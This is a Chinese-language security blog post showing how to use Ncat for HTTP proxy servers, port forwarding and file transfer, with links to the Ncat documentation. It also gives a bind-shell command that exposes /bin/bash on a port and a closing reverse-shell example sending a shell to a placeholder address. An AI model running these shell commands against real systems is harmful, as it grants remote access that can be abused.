Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

使用 Ncat 快速创建代理服务器

wpadmin~September 6, 2018 /InfoSec

使用 Ncat 快速创建代理服务器 proxy | reverse shell

参考方案

创建代理服务器

Ncat Proxy Options – Ncat Documentation

The currently available protocols in connect mode are http (CONNECT), socks4 (SOCKSv4), and socks5 (SOCKSv5). The only server currently supported is http. If this option is not used, the default protocol is http.

注意,虽然参数中存在 socks4socks5, 但实际上 Ncat 作为服务端现在仅支持 HTTP

#
# HTTPS
ncat --proxy-type http -lvp 7878 --ssl
# HTTP
ncat --proxy-type http -lvp 7878
ncat -l 3128 --proxy-type http
# 其他示例
ncat -l 3128 --proxy-type http
ncat -l 3128 --proxy-type http --proxy-auth <user>:<pass>

# Connect to example.org on TCP port 8080.
ncat example.org 8080

# Listen for connections on TCP port 8080.
ncat -l 8080

# Redirect TCP port 8080 on the local machine to host on port 80.
ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open

# Bind to TCP port 8081 and attach /bin/bash for the world to access freely.
ncat --exec "/bin/bash" -l 8081 --keep-open

# Bind a shell to TCP port 8081, limit access to hosts on a local
# network, and limit the maximum number of simultaneous connections to 3.
ncat --exec "/bin/bash" --max-conns 3 --allow 192.168.0.0/24 -l 8081 --keep-open

# Connect to smtphost:25 through a SOCKS4 server on port 1080.
ncat --proxy socks4host --proxy-type socks4 --proxy-auth joe smtphost 25

# Connect to smtphost:25 through a SOCKS5 server on port 1080.
ncat --proxy socks5host --proxy-type socks5 --proxy-auth joe:secret smtphost 25

# Create an HTTP proxy server on localhost port 8888.
ncat -l --proxy-type http localhost 8888

# 文件传输
# Send a file over TCP port 9899 from host2 (client) to host1 (server).
HOST1$ ncat -l 9899 > outputfile
HOST2$ ncat HOST1 9899 < inputfile

# Transfer in the other direction, turning Ncat into a “one file” server.
HOST1$ ncat -l 9899 < inputfile
HOST2$ ncat HOST1 9899 > outputfile

反弹 Shell

Reverse shell

#
# Server
ncat -lvvp xxx.xxx.xxx.xxx 1212
# Client
ncat -e cmd xxx.xxx.xxx.xxx 1212
# -e 参数制定要转发的二进制程序, Linux 下可以是 /bin/bash

pproxy
https://pypi.org/project/pproxy/

参考资料

@倾旋 我的安全成长口袋
https://t.zsxq.com/23J6e23

Chapter 17. Ncat Reference Guide
https://nmap.org/book/ncat-man.html

Proxying
https://nmap.org/ncat/guide/ncat-proxy.html

Proxy Options
https://nmap.org/book/ncat-man-proxy-options.html

Ncat Reference Guide
http://man7.org/linux/man-pages/man1/ncat.1.html

Leave a Reply

Your email address will not be published. Required fields are marked *